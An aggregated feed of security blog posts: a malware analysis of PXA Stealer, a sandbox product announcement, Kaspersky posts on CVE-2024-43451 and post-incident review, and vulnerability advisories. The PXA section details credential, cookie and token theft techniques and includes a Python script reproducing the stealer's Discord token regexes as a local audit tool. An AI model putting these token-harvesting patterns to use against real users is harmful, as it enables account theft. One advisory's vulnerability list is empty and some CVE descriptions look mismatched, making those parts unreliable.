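if __name__ == "__main__":
    for finding in triage(RUN_VALUES, STARTUP_FILES, LNK_COMMANDS):
        print("[!]", finding)
```

On a live host the same rules apply to the Run and RunOnce keys under both HKCU and HKLM, to the per-user and all-users Startup folders, and to the arguments stored in any .lnk those entries reference; the shortcut target matters more than the shortcut name, which here was chosen to look like a Windows component.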

PXA Stealer targets victims’ sensitive data 

PXA Stealer is a Python program that has extensive capabilities targeting a variety of data on the victim’s machine.   

When PXA Stealer runs, it first kills processes from a hardcoded list, including endpoint detection software, network capture and analysis tools, VPN software, cryptocurrency wallet applications, file transfer clients, web browsers and instant messaging applications, by executing “taskkill” commands.  

Detection evasive function of PXA Stealer. 

The stealer has the capability of decrypting the browser master key, which is a cryptographic key used by web browsers like Google Chrome and other Chromium-based browsers to protect sensitive information, including stored passwords, cookies, and other data in an encrypted form on the local system. The stealer accesses the master key file “Local State” located in the browser folder of the user’s profile directory, which contains the information of the encryption key used to encrypt the user data stored in the “Login Data” file, and decrypts it using the “CryptUnprotectData” function. This allows the attacker to gain access to the stored credentials and other sensitive browser information.   

Browser master key decryption function of PXA Stealer. 

The stealer also attempts to decrypt the master key stored in the key4.db file. Key4.db is a database used by Firefox (and other Mozilla-based browsers) to store encryption keys, in particular the master key that encrypts sensitive data such as saved passwords. The “getKey” function of the stealer extracts and decrypts keys from the key4.db file using either AES or 3DES, depending on which the stored key was encrypted with. 

Browser master key decryption function of PXA Stealer. 

The stealer attempts to retrieve user profile paths from the profiles.ini file of Mozilla-based browsers, including Mozilla Firefox, Pale Moon, SeaMonkey, Waterfox, Mercury, K-Meleon, IceDragon, Cyberfox and BlackHawk, for further processing such as extracting saved passwords or other user data. 

The stealer collects the victim’s login information from the browser’s login data file. The function “get_ch_login_data” of the stealer extracts login data, including URLs, usernames, and passwords, from the database “login_db”, which stores login information. The extracted login information is formatted into a string that includes the URL, username, decrypted password, browser, and profile.  

For each login entry in the browser login database, the function checks if the URL contains any important keywords that are hardcoded in the stealer program, and if a match is found, the login information is saved in a separate file named “Important_Logins.txt” located in the “Browsers Data” folder within the user’s profile temporary directory. The function saves all the results to “All_Passwords.txt” in the “Browsers Data” folder for other login data found in the database. 

Login credentials stealer function of PXA Stealer. 

The stealer executes another function, “get_ch_cookies”, to extract cookies from a specified browser’s cookie database, decrypt them, and save the results to a file. First, it checks if the cookies database file exists in the specified profile directory and unlocks the cookies database file. The database file is then copied to the temporary folder and is processed by executing an SQL query to retrieve cookie information, including host key, name, path, encrypted value, expiration time, secure flag, and HTTP-only flag from the cookies database file.  

If any Facebook cookies are found, they are concatenated to a single string called “fb_formatted”, and it calls another function, “ADS_Checker()”, to check for ads based on the Facebook cookies, and the results are written to a file called “Facebook_Cookies.txt”.  Any other cookie information is written to a text file named after the browser and the profile. Finally, the function removes the temporary cookie database file. 

Browser cookies stealer function of PXA Stealer. 

In another sample of the stealer, for the browsers Chrome, Chrome SxS, and Chrome(x86), it downloads and executes a cookie stealer JavaScript through the URL hxxps://tvdseo[.]com/file/PXA/Cookie_Ext.zip. The cookie stealer JavaScript connects to the Telegram bot with the token, and the chat ID hardcoded in the script collects the cookies and sends them to the attacker’s Telegram bot through the POST method.  

Browser cookie stealer JavaScript.

Next, the stealer targets the victim’s credit card information stored in the browser database “webappsstore.sqlite”. The function extracts and decrypts saved credit card information from a browser’s web data database. It checks whether the cards database file “cards_db” exists and copies it to the user’s profile temporary folder. It executes a SQL query to retrieve credit card information including the name on the card, expiration month/year, encrypted card number, and date modified. It then decrypts the encrypted card number with the function “decrypt_ch_value”, using the decrypted master key, and writes the card information to a text file named after the browser and the profile. Finally, it records the number of cards found and deletes the temporary copy of the “cards_db” file.  

Credit card data stealer function of PXA Stealer. 

The stealer extracts and saves the autofill form data from a browser’s database to a text file with the file name format of “$browser_$profile.txt” in a folder called “AutoFills” in browser profile location.  

Autofill data stealer function of PXA Stealer.

The stealer also extracts and validates Discord tokens stored in web browsers and in the Discord desktop applications. It looks for encrypted Discord tokens in the browsers’ database files and in the application files of Discord, Discord Canary, Lightcord and Discord PTB on the victim’s machine by searching for strings that match the regular expression r"dQw4w9WgXcQ:[^.*\['(.*)'\].*$][^\"]*". Once encrypted tokens are found, it decrypts them with the function “decrypt_dc_tokens()” using the master key extracted from the “Local State” file (the same key that was used to encrypt them), validates each decrypted token against Discord to confirm it is live, and stores it together with the browser name. Besides the encrypted tokens, the function also looks for unencrypted Discord tokens, matching the pattern “[\w-]{24}\.[\w-]{6}\.[\w-]{27}” for standard tokens and “mfa\.[\w-]{84}” for multi-factor authentication (MFA) tokens, in the “.log” and “.ldb” files of the LevelDB directory in which the Discord applications and web browsers store their structured key-value data. 

Discord token stealer function of PXA Stealer. 
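As an added example (not Talos’ code or the stealer’s), the token search can be reproduced offline to check what a Discord desktop client’s or browser’s LevelDB store would hand to this stealer. The two plaintext patterns are the ones quoted above with their backslashes restored; the pattern for the encrypted “dQw4w9WgXcQ:” form is a simplification of mine (the prefix followed by a base64 blob) rather than the stealer’s exact expression, and the LevelDB content is constructed from placeholder characters, not real tokens.

```python
import re

# Plaintext token shapes, as quoted above.
PLAIN_TOKEN = re.compile(r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}")
MFA_TOKEN = re.compile(r"mfa\.[\w-]{84}")
# Encrypted form written by Chromium-based Discord clients: fixed prefix, then a base64 blob.
# This regex is an assumed simplification, not the stealer's own expression.
ENCRYPTED_PREFIX = "dQw4w9WgXcQ:"
ENCRYPTED_TOKEN = re.compile(re.escape(ENCRYPTED_PREFIX) + r"[A-Za-z0-9+/=]+")


def find_tokens(blob: str) -> dict:
    """Return every candidate token in a LevelDB .log/.ldb blob, bucketed by type.
    The encrypted bucket holds only the base64 part, which still needs the browser's
    DPAPI-protected master key from "Local State" to be of any use."""
    return {
        "plain": PLAIN_TOKEN.findall(blob),
        "mfa": MFA_TOKEN.findall(blob),
        "encrypted": [m[len(ENCRYPTED_PREFIX):] for m in ENCRYPTED_TOKEN.findall(blob)],
    }


def redact(token: str, keep: int = 6) -> str:
    """Show only a prefix so findings can be logged without copying the secret."""
    return token[:keep] + "..." + f"({len(token)} chars)"


def scan_file(path: str) -> dict:
    """Scan one .log/.ldb file. LevelDB files are binary, so decode loosely."""
    with open(path, "rb") as fh:
        return find_tokens(fh.read().decode("utf-8", errors="ignore"))


# Constructed LevelDB-like content with placeholder tokens (not real credentials).
SAMPLE_BLOB = (
    '\x00\x01"token":"' + "A" * 24 + "." + "B" * 6 + "." + "C" * 27 + '"\n'
    '"token":"mfa.' + "D" * 84 + '"\n'
    '"token":"dQw4w9WgXcQ:QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo="\n'
)

if __name__ == "__main__":
    for kind, hits in find_tokens(SAMPLE_BLOB).items():
        for hit in hits:
            print(kind, redact(hit))
```

Point scan_file at the .log and .ldb files under the Discord client’s Local Storage\leveldb directory (or a browser profile’s) to see which of the three forms are present; a hit in the “plain” or “mfa” bucket means the token is recoverable without any key material at all.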

The stealer executes another function to extract the user information from the MinSoftware application database. It searches for the database file “db_maxcare.sqlite” file on the victim machine folders, including Desktop, Documents, Downloads, OneDrive and in the logical partitions with the drive letters “D:” and “E:”. Once found, it executes a SQL query to search in the accounts table of the database file and extracts the following data: 

  • uid: User identifier. 
  • pass: User’s password. 
  • fa2: Two-factor authentication data. 
  • email: The user’s email address. 
  • passmail: The email password. 
  • cookie1: Likely a session or authentication cookie. 
  • token: Likely an authentication token. 
  • info: Account information. 
MinSoftware application data stealer function of PXA Stealer. 

The stealer also has the functionalities for interacting with Facebook Ads Manager and Graph API using a session authenticated via cookies.  

  • It takes a Facebook cookie and parses it for the session information, such as “c_user”, and attempts to access the token. 
  • Retrieves and formats the details about the user’s ad accounts, such as account status, currency, balance, spend cap, and amount spent.  
  • Gets the list of the user’s Facebook pages, including page name, link, likes, followers, and verification status. 
  • It retrieves a list of groups with administrative users. 
  • It extracts Business Manager IDs associated with the account and retrieves ad account information under each Business Manager. 
  • It uses Facebook data to determine ad account limits for a Business Manager. 
  • It extracts the token from Facebook mobile pages to make authenticated requests. 
Facebook data stealer function of PXA Stealer. 

After collecting the targeted victim’s data, including the login data, browser cookies, autofill information, credit card details, Facebook ads account data, cryptocurrency wallet data, Discord token details, and MinSoftware application data, the stealer creates a ZIP archive of all the files in the user profile’s temporary folder with the file name format “CountryCode_Victim’s public IP Computername.zip”, using the highest compression level (9).  

While creating the archive and navigating the targeted folders, the stealer excludes some of the directories, including user_data, emoji, tdummy, dumps, webview, update-cache, GPUCache, DawnCache, temp, Code Cache, and Cache. It also attempts to rename each file while adding them to the archive. The archive is exfiltrated to the actor’s Telegram bot. After exfiltrating the victim’s data, the stealer deletes the folders that contained the collected user data.  

Exfiltration function of PXA Stealer. 

Coverage 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protection with context to your specific environment and threat data are available from the Firewall Management Center

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are listed below: 

Snort2: 64217, 64204, 64216, 64215, 64214, 64213, 64212, 64211, 64210, 64209, 64208, 64207, 64206, 64205, 64203 

Snort3: 301057, 301063, 301062, 301061, 301060, 301059, 64217, 301058   

ClamAV detections are also available for this threat: 

Win.Loader.RustLoader-10036712-0 
Py.Infostealer.PXAStealer-10036718-0 
Py.Infostealer.PXAStealer-10036725-0 
Txt.Tool.PXAStealerInstaller-10036719-0 
Txt.Tool.PXAStealerInstaller-10036724-0 
Lnk.Downloader.PXAStealer-10036720-0 
Js.Infostealer.CookieStealer-10036722-0 

Indicators of Compromise 

IOCs for this research can be found in our GitHub repository here

Cisco Talos Blog – Read More

Automated Interactivity: Stage 2

Last year, we introduced Automated Interactivity — a feature that simulates user behavior inside the ANY.RUN sandbox to automatically force cyber attack execution. 

The first stage of Automated Interactivity focused on basic user interactions like clicking buttons and completing CAPTCHA challenges. This allowed many analysts to simplify their investigations and streamline the sandbox use via API. 

Today, we are excited to announce the release of the next stage of Automated Interactivity — the Smart Content Analysis mechanism that takes its threat detection capabilities to a new level, delivering better and more in-depth examination of the most complex attacks. 

Here’s what you need to know about this exciting upgrade. 

What is Smart Content Analysis 

Smart content analysis is a mechanism that enables Automated Interactivity to automatically execute malware and phishing attacks by identifying and detonating their key components at each stage of the kill chain. 

It works in three steps: 

  • Content Identification: It scans uploaded samples for notable content, such as URLs and email attachments. 
  • Content Extraction: It extracts the content that needs to be detonated to force the attack to move forward like URLs from QR codes and phishing links that were rewritten by security tools. 
  • Simulated User Interactions: It then simulates user interactions with the extracted content, for instance, by opening URLs in a browser and launching malware payloads inside archives. 

How Smart Content Analysis Adapts to New Threats 

Unlike traditional automated solutions that are limited by pre-programmed algorithms, ANY.RUN’s Smart Content Analysis is built to continuously evolve with the current threat landscape. 

Our team of threat analysts update it with new attack scenarios as soon as they are detected. This ensures nearly instant adaptability to the latest threats and techniques. 

Why Use It 

The upgraded version of Automated Interactivity is an excellent addition to your security workflow, as it:  

  • Improves threat detection for sandbox sessions launched via API  
  • Helps security specialists with analysis by automating complex tasks, providing them with valuable insights and reducing the learning curve  
  • Automates repetitive tasks, reducing the manual effort required for threat analysis and allowing analysts to focus on more strategic activities  
  • Speeds up analysis by quickly identifying and analyzing threats, enabling faster response and remediation  



Types of Content It Can Detonate 

Smart Content Analysis can automatically identify and detonate different types of content when moving along the kill chain, including: 

  • URLs inside QR codes: It can automatically extract and open URLs embedded within QR codes, a common tactic for phishing attempts or malware distribution.  
  • Modified Links: Security solutions and spam filters can often rewrite malicious URLs to prevent them from reaching users. This can prevent automated sandboxes from forcing the attack execution beyond the safe link. Smart Content Analysis easily removes the security layer and detonates the original malicious URL. 
  • Multi-Stage Redirects: Many cyber attacks employ complex chains of redirects to obfuscate their final destination. Smart Content Analysis quickly locates the hidden page by bypassing the redirect ones. 
  • Email Attachments: Email attachments are a popular method for attackers to deliver malware. Smart Content Analysis can automatically process and detonate these attachments, as well as their contents. 
  • Payloads within Archives: Modern attacks often utilize archives (ZIP, RAR, etc.) to bundle malicious payloads. Smart Content Analysis executes these payloads with no problem. 

Use Cases for Upgraded Automated Interactivity 

Extracting URL from QR and Solving a CAPTCHA

See a video recording of the analysis performed by Automated Interactivity

Let’s demonstrate how Automated interactivity works using a multi-stage phishing attack that starts with an email: 

The initial email with a PDF attachment opened in the ANY.RUN sandbox 

Step 1: We upload the email file to the ANY.RUN sandbox, switch on Automated Interactivity, and start analysis. 

The pdf file containing a QR code 

Step 2: Automated Interactivity launches the .eml file via Outlook, identifies a PDF attachment, and opens it. 

The static analysis module in ANY.RUN lets you see the link hidden in the QR 

Step 3: After scanning the PDF, it detects a QR code, automatically extracts its embedded URL, and opens it inside a browser. 

The sandbox automatically solves CAPTCHA challenges 

Step 5: The opened page has a CAPTCHA challenge, a common method for evading detection. Thanks to Automated Interactivity, the sandbox successfully solves the CAPTCHA and proceeds to the next stage. 

The final phishing page reached via Automated Interactivity 

Step 6: Once the final phishing page is loaded, the sandbox instantly assigns the “phish-url” tag to the session and marks it with the “malicious activity” label. 

Forcing Formbook Execution from an Archive Attachment 

Automated Interactivity quickly identifies and detonates Formbook inside an archive attached to an email

Automated Interactivity is also excellent for analyzing malware attacks.  

The malicious email with a .zip attachment 

Consider the following analysis session where the feature was used to detonate a sample of Formbook distributed via a phishing email. 

Suricata rule used for detecting Formbook activity 

The service was able to automatically extract the ZIP file found in the email. It then identified a Formbook executable inside the archive and ran it to observe its behavior.




Extracting Rewritten URL 

Modern email systems are equipped with spam filtering. While it protects users against threats, it complicates the work of security analysts by blocking their access to the actual malicious content that they wish to examine. 

Automated Interactivity bypasses such filters and quickly reaches the resources controlled by the threat actors, saving analysts’ time. 

Here is a sandbox session featuring a blocked phishing URL.

Attack analysis stops at Microsoft’s scam filtering page 

The phishing link inside the analyzed email is rewritten to Microsoft’s domain safelinks[.]protection[.]outlook[.]com and now contains a warning.

While it indicates that the link is malicious, it prevents us from learning more about the threat we’re facing. 

To go beyond the block, we can simply enable Automated Interactivity and rerun the analysis.  

With Automated Interactivity, the attack is executed quickly and with ease 

In the new sandbox session, the rewritten URL is skipped, and all the stages of the attack, including those requiring solving a CAPTCHA, are detonated automatically and as intended. 

Tags provide information on the threat at hand 

This allows us to go further and discover that the attack is carried out by the Storm-1575 threat actor using the DadSec phishing platform, as shown by the corresponding tags. 

What’s Next for Automated Interactivity 

Smart Content Analysis is not the final chapter of Automated Interactivity.  

We are already working on Stage 3 — another mechanism that will further improve the detection rate and make the sandbox even better at automatically detonating attacks.  

Stay tuned for updates! 

Try It Now

See how you can speed up your analysis of the latest cyber attacks with Automated Interactivity. The feature is available to Hunter and Enterprise-plan users. It is also activated by default for all sandbox sessions launched via API. 

To manually enable Automated Interactivity: 

Submit File or URL

1. Navigate to ANY.RUN’s home screen and submit your sample

Enable Automated Interactivity and start analysis

2. Switch on the Automated Interactivity (ML) toggle 

3. Run analysis 

You can get a 14-day free trial of ANY.RUN’s Interactive Sandbox to try Automated Interactivity along with other PRO features like private mode, teamwork, and advanced VM configuration. 

About ANY.RUN  

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.  

With ANY.RUN you can: 

  • Detect malware in seconds
  • Interact with samples in real time
  • Save time and money on sandbox setup and maintenance
  • Record and study all aspects of malware behavior
  • Collaborate with your team 
  • Scale as you need

Request free trial of ANY.RUN’s products →

The post Automated Interactivity: Stage 2 appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – Read More

CVE-2024-43451 allows stealing NTLMv2 hash | Kaspersky official blog

With November’s Patch Tuesday Microsoft fixed 89 vulnerabilities in its products — two of which are being actively exploited. One of them — CVE-2024-43451 — is particularly alarming. It allows attackers to gain access to the victim’s NTLMv2 hash. Although it doesn’t have an impressive CVSS 3.1 rating (only 6.5 / 6.0), its exploitation requires minimal interaction from the user, and it exists thanks to the MSHTML engine — the legacy of Internet Explorer — which is theoretically deactivated and no longer used. Nevertheless, all current versions of Windows are affected by this vulnerability.

Why is CVE-2024-43451 so dangerous?

CVE-2024-43451 allows an attacker to create a file that, once delivered to the victim’s computer, gives the attacker the possibility of stealing the NTLMv2 hash. NTLMv2 is a challenge-response network authentication protocol used in Microsoft Windows environments; what the attacker captures is the NTLMv2 response the victim’s machine sends when it tries to authenticate to the attacker’s server. With that response in hand, the attacker can try to crack it offline to recover the user’s password, or relay it to another service that accepts NTLM authentication, posing as a legitimate user without knowing their real credentials. (Unlike an NT hash, an NTLMv2 response cannot simply be passed to authenticate elsewhere; cracking or relaying is what makes it useful.)

Of course, CVE-2024-43451 alone is not enough for a full-fledged attack — cybercriminals would have to use other vulnerabilities — but someone else’s NTLMv2 hash would make the attacker’s life much easier. At this point in time we have no additional information about scenarios that use CVE-2024-43451 in practice, but the vulnerability description clearly states that the vulnerability is publicly disclosed, and cases of exploitation have been detected in the wild.

What does “minimal interaction” mean?

It is generally assumed that if a user doesn’t open a malicious file — nothing bad can happen. In this case, that’s not true. According to the mini-FAQ in the security update guide advisory on CVE-2024-43451, exploitation may occur even when the user selects the file (single left-click), inspects it (with a right-click), or performs some “action other than opening or executing”.

What other vulnerabilities did Microsoft close in the November patch?

The second vulnerability that is already being exploited in real attacks is CVE-2024-49039. It allows attackers to escape from the AppContainer environment and, as a result, escalate their privileges to a Medium Integrity Level. In addition, there are two more holes that the company states are disclosed, although they’ve not yet been noticed in real attacks. These are CVE-2024-49019 in the Active Directory Certificate Service, which also allows the attacker to elevate privileges, and CVE-2024-49040 in Exchange, thanks to which malicious emails can be displayed with a fake sender address.

In addition, the critical vulnerability CVE-2024-43639, which allows remote code execution in Kerberos, also looks dangerous — though it only affects servers that are configured as a Kerberos Key Distribution Center (KDC) Proxy Protocol server.

How to stay safe?

In order to stay safe, we recommend, firstly, promptly installing updates for critical software (which, of course, includes the operating systems). In addition, it’s worth remembering that most attacks exploiting software vulnerabilities begin via email. Therefore, we recommend equipping all work devices with a reliable security solution, and not forget about protection at the mail gateway level.

Kaspersky official blog – Read More

How to prevent company from getting hacked again | Kaspersky official blog

Serious cybersecurity incidents often impact many different parties — including those who don’t typically handle IT or security matters on a daily basis. Of course, the initial response needs to focus on identifying, containing, and recovering from an incident. But once the dust has settled, the time comes for another crucial stage: learning from the experience. What can the incident teach us? How can we improve our chances of preventing similar attacks in the future? These questions are well worth answering — even if the incident caused no significant damage due to an effective response or simply luck.

Involving people

Incident analysis is important for the whole organization. It’s crucial to involve not only IT and security teams but also senior management and IT system stakeholders, as well as any third-party vendors affected by the incident or involved in its response. A productive atmosphere is crucial. It’s important to emphasize that this isn’t a witch hunt (though mistakes will be discussed). Blame-shifting and manipulating information will only distort the picture, hinder analysis, and harm the organization’s long-term security.

Many companies keep incident details under wraps, fearing reputational damage or a repeat attack. While this is completely understandable, and certain details should indeed remain confidential, striving for maximum transparency in response is important. Specifics of an attack and response should be shared, if not with the general public, then at least with a trusted circle of peers in the cybersecurity field who can then help others prevent similar attacks on their organizations.

Detailed incident analysis

Although much incident data is already collected during the response phase, post-incident analysis provides an opportunity for deeper insights. First of all, answer questions like: How and when did the adversary penetrate the organization? What vulnerabilities and technical/organizational weaknesses were exploited? How did the attack unfold? Mapping attacker actions and response efforts on a timeline helps pinpoint when anomalies were detected, how they were identified, what response measures were taken, whether all relevant teams were promptly engaged, and if escalation scenarios were followed.

The answers to these questions should be documented meticulously, referencing factual data like SIEM logs, timestamps for task creation in the task manager, timestamps for emails being sent, and so on. This enables you to build a comprehensive and detailed picture, allowing for collective evaluation of both the speed and effectiveness of each response step.

It’s also necessary to separately assess an incident’s impact on other aspects of the business, such as continuity of operations, data integrity and leaks, financial losses (both direct and indirect), and company reputation. This will help balance the scale and cost of the incident against the scale and cost of measures to strengthen information security.

Identifying strengths and weaknesses

Technical incident reports may seem to contain all the information you need, but in reality they often lack crucial organizational context. A report might state that attackers accessed the system by exploiting a certain vulnerability, and that the organization needs to patch said vulnerability on all servers. However, this superficial analysis overlooks critical questions: How long did this vulnerability remain unpatched after it was disclosed? What other known vulnerabilities exist on the servers? What are the agreed-upon patching SLAs between IT and cybersecurity? Does vulnerability prioritization exist within the company?

Each stage and process affected by the incident deserves this level of scrutiny. This holistic approach makes it possible to assess the flaws in the security landscape that enabled the incident. It’s important not to focus solely on the negatives: if certain teams responded quickly and effectively or if existing processes/technologies aided in incident detection or mitigation, these aspects should also be analyzed to understand whether this positive experience can be applied elsewhere.

Human error and behavioral factors warrant special attention. What role did they play? Again, the goal isn’t to blame but to identify measures to mitigate or balance the inevitable impact of human factors in the future.

Planning for improvement

This is the most creative and organizationally challenging phase of the incident review. It requires developing effective, realistic steps to address weaknesses within resource constraints. Involving senior management in this process is especially beneficial — as the saying goes, cybersecurity budgets are never approved faster than after a major incident. Several aspects should be considered in the plan:

IT asset map update. The incident may have revealed a lot of new information about how the company’s data is processed and how processes are implemented in general. It’s often necessary to update priorities, reflecting a better understanding of which assets require the most protection.

Detection and response technologies. By analyzing which stages of the attack went undetected by defenders, and which technical measures were missing to stop the attack’s progression, the team can plan to implement additional security tools, such as EDR, SIEM, and NGFW. Sometimes it becomes clear that while the necessary tools seem to be in place, they lack automation (for example, automated response playbooks), or data streams (such as threat intelligence feeds). Or, perhaps, log storage practices facilitated their wholesale deletion by the attackers. Technology enhancements should receive special attention if the analysis showed that defenders spent an excessive amount of time manually searching for compromised hosts or other laborious tasks, lacked access to critical information, or didn’t have the tools for enterprise-wide response.

Processes and policies. Having determined whether the incident occurred due to violations of existing policies or their absence, it’s essential to address this by revisiting the entire chain of events, correcting any identified process deficiencies, and reflecting these corrections in the security policy. Ranging from processes, policies, and regulatory timelines for vulnerability and account management, to incident response playbooks — the revised company processes should ensure the prevention of any similar future incidents.

The overall incident response plan should also be updated and refined based on practical experience. It’s important to clarify which parties were unable to fully participate in the process, and how to organize rapid communication between them to ensure swift decision-making in emergencies.

Proactive measures: technology. Incidents provide an opportunity to take a fresh look at existing practices for account management and patch management. Step-by-step improvements should be planned in areas where the company hasn’t followed best practices: implementing the principle of least privilege and centralized identity management, and prioritizing and systematically addressing key infrastructure vulnerabilities.

Proactive measures: people. Each human error requires corrective measures — targeted training or even drills tailored to individual roles. It’s worth discussing what training is necessary for specific individuals, departments, or the entire organization. A major incident can be a powerful wake-up call, emphasizing the importance of information security and driving engagement in cybersecurity awareness training, even among those who usually downplay its importance.

Following updated processes may be more challenging — requiring a special effort in training. Reminders from management and an incentive program may be necessary to ensure the updated regulations are fully adopted.

Preparing for the next incident

All of the measures listed above will enhance cybersecurity resilience, and readiness for incidents — in theory. But to be sure of the result, it’s worth validating their effectiveness through cybersecurity exercises, penetration testing, or red teaming. These simulations of real cyber-incidents serve different purposes, so which combination is most suitable depends on the organization and the measures taken post-incident.

Implementing all the improvements and updated security measures can be a lengthy, phased process, so regular meetings with all involved parties are necessary to collect feedback, discuss implementation, address challenges, and explore further security enhancements. To ensure these meetings are not mere empty talk, it’s essential to agree on specific metrics and milestones to track progress effectively.

Kaspersky official blog – Read More

Australian Cyber Security Center Highlights Key Vulnerabilities Exploited in 2023

Cyber Security

Key Takeaways  

  • Commonly exploited vulnerabilities in 2023 affected Citrix NetScaler, Fortinet FortiOS, and Atlassian Confluence, with attacks involving remote code execution, buffer overflows, and session token leakage. 

  • The advisory was coauthored by international agencies, including ACSC, CISA, the FBI, and cybersecurity bodies from Canada, New Zealand, and the UK, highlighting global collaboration in combating cyber threats. 

  •  Exploited vulnerabilities often stem from code injection, buffer overflows, and improper input validation, emphasizing the need for secure coding practices. 

  • Organizations should implement security by design, adopt secure software development frameworks, and prioritize patch management to protect against known vulnerabilities. 

  • The advisory recommends deploying tools like EDR systems and employing Zero Trust Network Architecture (ZTNA) to detect zero-day exploits and limit lateral movement within networks. 

Overview 

The Australian Cyber Security Center (ACSC) has issued an important cybersecurity advisory detailing a range of vulnerabilities in 2023. The report, which was coauthored by cybersecurity agencies from the United States, Australia, Canada, New Zealand, and the United Kingdom, provides a comprehensive overview of the vulnerabilities most targeted by cybercriminals, including the risks posed by zero-day exploits.  

This advisory aims to inform organizations worldwide about the growing cyber threat landscape and offers guidance to minimize the risks posed by these vulnerabilities. The ACSC’s advisory identifies the most frequently exploited Common Vulnerabilities and Exposures (CVEs) of 2023 and their associated Common Weakness Enumerations (CWEs). 

This security advisory is a collaborative effort from cybersecurity agencies around the world, including the Australian Cyber Security Center (ACSC), the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and cybersecurity agencies from Canada, New Zealand, and the United Kingdom.  

In particular, CISA has worked closely with international partners to monitor, identify, and mitigate common vulnerabilities, reinforcing their shared commitment to securing digital infrastructure. The FBI has also been actively involved in identifying cyber threat actors exploiting these vulnerabilities, especially those targeting critical infrastructure in both the public and private sectors.  

Key Findings: Zero-Day Exploits on the Rise 

One of the most concerning trends identified in the advisory is the increasing exploitation of zero-day vulnerabilities. These vulnerabilities, which are unknown to the software vendor or the public at the time of exploitation, allow attackers to bypass security defenses and gain unauthorized access to systems.  

In 2023, cybercriminals used zero-day vulnerabilities to exploit systems rapidly after their disclosure. Notably, these exploits were used to compromise high-value targets, including organizations in critical sectors such as healthcare, finance, and government. 

The ACSC’s advisory highlights that reducing the lifespan of zero-day exploits can be achieved by improving security lifecycles and ensuring responsible vulnerability disclosure. Both vendors and developers are urged to adopt secure-by-design principles and frameworks like the SP 800-218 Secure Software Development Framework (SSDF) to enhance the security of software from the ground up. 

Top Vulnerabilities Exploited in 2023 

The advisory identifies several CVEs that were routinely exploited in 2023. Among the most frequently targeted vulnerabilities are: 

These vulnerabilities were exploited by a variety of cyber threat actors, including advanced persistent threat (APT) groups and ransomware operators. For instance, CVE-2023-34362, which affects the MOVEit Transfer product, was actively targeted by the CL0P ransomware gang. Similarly, CVE-2023-22515 in Atlassian Confluence was exploited by threat actors to gain unauthorized access to corporate networks, compromising sensitive data.

In many cases, these exploits were used to execute remote code, bypass authentication, or escalate privileges within affected systems. These vulnerabilities often result in significant disruption, financial loss, and reputational damage to affected organizations. 

Common Weakness Enumerations (CWEs) 

The advisory also sheds light on the associated Common Weakness Enumerations (CWEs) that underlie many of the vulnerabilities exploited in 2023. For example: 

  • CWE-94: Code injection, which was present in vulnerabilities like CVE-2023-3519 (Citrix NetScaler buffer overflow). 
  • CWE-119: Buffer overflow, as seen in CVE-2023-4966 (Citrix NetScaler session token leakage). 
  • CWE-20: Improper input validation, which was implicated in CVE-2023-22515 (Atlassian Confluence arbitrary code execution). 

By understanding the CWEs associated with these CVEs, organizations can implement more targeted defenses to mitigate the risk of exploitation. Developers are encouraged to adopt practices that prevent these weaknesses from being introduced in the first place, such as using memory-safe languages and conducting regular security testing. 

Recommendations for Vendors, Developers, and End-Users 

In response to these findings, the advisory provides several key recommendations for organizations and developers to enhance their cybersecurity posture and reduce the risk of exploitation: 

  • Vendors are encouraged to integrate security into the development process from the start, using frameworks like SP 800-218 SSDF to guide their efforts. 

  • Developers should ensure that vulnerabilities are disclosed responsibly, including the root causes and associated CWEs, to help the broader community implement effective mitigation measures. 

  • Regularly applying patches is critical to mitigating known vulnerabilities. End-users should also implement centralized patch management systems to streamline the process and ensure that vulnerabilities are addressed promptly. 

  • Security tools like EDR systems are essential for detecting zero-day exploits. Organizations should prioritize their deployment to help identify suspicious activities and mitigate risks before they escalate. 

  • Organizations are urged to have up-to-date incident response plans in place and ensure that system backups are securely stored and regularly tested to recover from potential attacks. 

Conclusion 

The Australian Cyber Security Center (ACSC), in partnership with CISA, the FBI, and other international cybersecurity agencies, is calling on vendors, developers, and end-users to take immediate action to address these vulnerabilities and enhance their overall cybersecurity posture.  

By following the advisory’s recommendations, organizations can reduce their exposure to cyber threats and strengthen their defenses against cyberattacks. The collaboration between global cybersecurity agencies emphasizes the importance of shared intelligence and international cooperation in the fight against cybercrime. 

The post Australian Cyber Security Center Highlights Key Vulnerabilities Exploited in 2023 appeared first on Cyble.

Blog – Cyble – Read More

IT Vulnerability Report: Exposed Fortinet Vulnerabilities Approach 1 Million

CybleBlogs

Cyble Research and Intelligence Labs (CRIL) researchers investigated 18 vulnerabilities and 10 dark web exploits in the last week – including an actively exploited Fortinet vulnerability with nearly 1 million exposed assets on the internet.

Other vulnerabilities analyzed by Cyble affect third-party Windows drivers, SharePoint, Qualcomm, Android, QNAP and more.

Here are the vulnerabilities highlighted by Cyble as meriting high-priority attention by security teams.

CVE-2024-23113: FortiOS Format String Vulnerability

CVE-2024-23113 is a critical format string vulnerability affecting Fortinet’s FortiOS, specifically within the FGFM (FortiGate to FortiManager) service. The vulnerability could allow unauthenticated remote code execution (RCE) by malicious actors.

